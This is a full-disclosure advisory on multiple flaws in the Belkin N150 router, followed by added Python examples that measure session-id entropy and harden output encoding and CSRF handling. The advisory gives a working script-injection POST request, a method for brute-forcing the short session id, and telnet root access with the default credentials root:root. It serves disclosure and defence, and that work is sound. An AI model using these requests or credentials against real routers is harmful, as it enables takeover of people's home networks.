Full Disclosure:

#Exploit Title: Belkin N150 Wireless Home Router Multiple Vulnerabilities
#Exploit Author : Rahul Pratap Singh
#Date : 30/Nov/2015
#Home Page Link : http://www.belkin.com
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched

→ Vulnerability/BUG Report :

1)
• Vulnerability Title: HTML/Script Injection
• Version: F9K1009 v1
• Firmware: 1.00.09

→ Proof of Concept:
The parameter "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" is vulnerable.
[embedded post: Belkin N150 Router Multiple Vulnerabilities, see Ref]

→ Steps to Reproduce:
Send the following POST request using Burp Suite or a similar tool:

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)
• Vulnerability Title: Session Hijacking
• Version: F9K1009 v1
• Firmware: 1.00.09

→ Proof of Concept:
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

The sessionid is hex encoded and of fixed length, i.e. 8 characters. Therefore it can be brute-forced in a feasible amount of time, as the session id only ranges from 00000000 to ffffffff.

→ Steps to Reproduce:
Send the following request using Burp Suite and brute-force the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)
• Vulnerability Title: Telnet Enabled with Default Pass
• Version: F9K1009 v1
• Firmware: 1.00.09

→ Vulnerability Details:
The Telnet protocol can be used by an attacker to gain remote access to the router with root privileges.
→ Proof of Concept:
[embedded post: Belkin N150 Router Multiple Vulnerabilities, see Ref]

→ Steps to Reproduce:
1) Open a terminal
2) Type the following command: telnet 192.168.2.1
3) The default user and pass is root:root

4)
• Vulnerability Title: Cross Site Request Forgery
• Version: F9K1009 v1
• Firmware: 1.00.09

→ Proof of Concept:
The request doesn't contain any CSRF token. Therefore, requests can be forged. It can be verified with any request.

Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again: 25 Nov 2015
No Response.
Full Disclosure: 30 Nov 2015

Ref:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/ (Belkin N150 Router Multiple Vulnerabilities)
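Added example for item 2 (mine, not part of the advisory and not Belkin's code): a small Python check that quantifies the session-cookie weakness the advisory describes and shows what an acceptable replacement identifier looks like. It uses the advisory's sessionid value 7cf2e9c5 as sample input; the 128-bit threshold, the alphabet inference and the secrets-based generator are my choices, not anything the page states.

```python
import math
import secrets
import string

# Constructed input: the session cookie value quoted in the advisory.
ADVISORY_SESSION_ID = "7cf2e9c5"


def alphabet_size(token: str) -> int:
    """Size of the smallest standard alphabet covering every character in the token.

    A single observed token only bounds the alphabet from below, so the entropy
    figure derived from it is the most the generator could be providing, not a
    measurement of what it actually provides.
    """
    chars = set(token)
    if chars <= set(string.digits):
        return 10
    if chars <= set("0123456789abcdef"):
        return 16
    if chars <= set(string.ascii_letters + string.digits):
        return 62
    if chars <= set(string.ascii_letters + string.digits + "-_"):
        return 64
    return 95  # printable ASCII


def keyspace(token: str) -> int:
    """Number of distinct tokens of this length over the inferred alphabet."""
    return alphabet_size(token) ** len(token)


def max_entropy_bits(token: str) -> float:
    """Upper bound on the entropy (in bits) a token of this shape can carry."""
    return len(token) * math.log2(alphabet_size(token))


def assess_session_id(token: str, min_bits: int = 128) -> dict:
    """Summarise a session identifier's shape and whether it clears a
    minimum-entropy bar (128 bits is a common baseline for web sessions)."""
    bits = max_entropy_bits(token)
    return {
        "length": len(token),
        "alphabet": alphabet_size(token),
        "keyspace": keyspace(token),
        "max_bits": bits,
        "acceptable": bits >= min_bits,
    }


def new_session_id(nbytes: int = 16) -> str:
    """Generate a replacement identifier: 16 bytes from the OS CSPRNG,
    hex encoded, i.e. 32 characters carrying 128 bits."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    weak = assess_session_id(ADVISORY_SESSION_ID)
    print(f"advisory sessionid {ADVISORY_SESSION_ID}: {weak['length']} chars, "
          f"alphabet {weak['alphabet']}, keyspace {weak['keyspace']:,}, "
          f"at most {weak['max_bits']:.0f} bits -> acceptable={weak['acceptable']}")
    strong = new_session_id()
    print(f"replacement {strong}: at most {max_entropy_bits(strong):.0f} bits")
```

For the advisory's value the check reports an 8-character hex token, a keyspace of 2^32 and at most 32 bits of entropy, which is why the author's "00000000 to ffffffff" observation matters; the same function applied to a 32-character hex token reports 128 bits and passes.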
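Added example for items 1 and 4 (mine, not the vendor's firmware code): a minimal Python handler for the settings POST that attribute-encodes the language value before reflecting it and rejects state-changing requests that lack the CSRF token issued to the session. The parameter name and the injected value are taken from the advisory's request; the rendered <input> fragment, the csrf_token field, the in-memory token store and the session id used as a lookup key are constructed assumptions.

```python
import hmac
import html
import secrets
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlencode

# Parameter name from the advisory's request (decoded "var:" prefix form)
# and the injected value from its proof of concept.
LANGUAGE_PARAM = "var:InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language"
INJECTED_VALUE = '"><script>alert("1")</script><script>"'

# Constructed in-memory store of per-session CSRF tokens (hypothetical; the
# router's real session handling is not described on the page).
_csrf_tokens = {}


def render_vulnerable(language: str) -> str:
    """'Before': the stored value is reflected into an attribute as-is, so a
    value containing a quote and angle brackets closes the attribute and tag."""
    return f'<input name="language" value="{language}">'


def render_hardened(language: str) -> str:
    """'After': attribute-encode the value so it cannot break out of the quoted
    attribute; html.escape(quote=True) encodes & < > " and '."""
    return f'<input name="language" value="{html.escape(language, quote=True)}">'


def issue_csrf_token(session_id: str) -> str:
    """Create a fresh token bound to the session; the settings form must embed
    it so the browser sends it back with every state-changing POST."""
    token = secrets.token_urlsafe(32)
    _csrf_tokens[session_id] = token
    return token


def handle_set(session_id: str, body: str) -> Tuple[int, str]:
    """Process an obj-action=set POST body. Returns (HTTP status, response body).

    The request is rejected unless it carries the token issued to this session;
    a cross-site form post has no way to learn that token, so a forged request
    fails before any setting is touched.
    """
    form = parse_qs(body, keep_blank_values=True)
    supplied = form.get("csrf_token", [""])[0]
    expected = _csrf_tokens.get(session_id)
    if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    if form.get("obj-action", [""])[0] != "set":
        return 400, "unsupported action"
    language = form.get(LANGUAGE_PARAM, [""])[0]
    return 200, render_hardened(language)


def build_body(language: str, csrf_token: Optional[str] = None) -> str:
    """Assemble a form body shaped like the advisory's, optionally with the token."""
    fields = {LANGUAGE_PARAM: language, "obj-action": "set", "var:page": "deviceinfo"}
    if csrf_token is not None:
        fields["csrf_token"] = csrf_token
    return urlencode(fields)


if __name__ == "__main__":
    sid = "7cf2e9c5"  # the advisory's session id, used here only as a dictionary key
    print("vulnerable:", render_vulnerable(INJECTED_VALUE))
    print("hardened:  ", render_hardened(INJECTED_VALUE))
    print("no token:  ", handle_set(sid, build_body("en")))
    print("with token:", handle_set(sid, build_body(INJECTED_VALUE, issue_csrf_token(sid))))
```

Run stand-alone, the vulnerable renderer emits a live script tag while the hardened one emits &quot;&gt;&lt;script&gt;... inside the attribute, and the handler answers 403 to a request that omits or mismatches the token and 200 only to one carrying the token issued for that session.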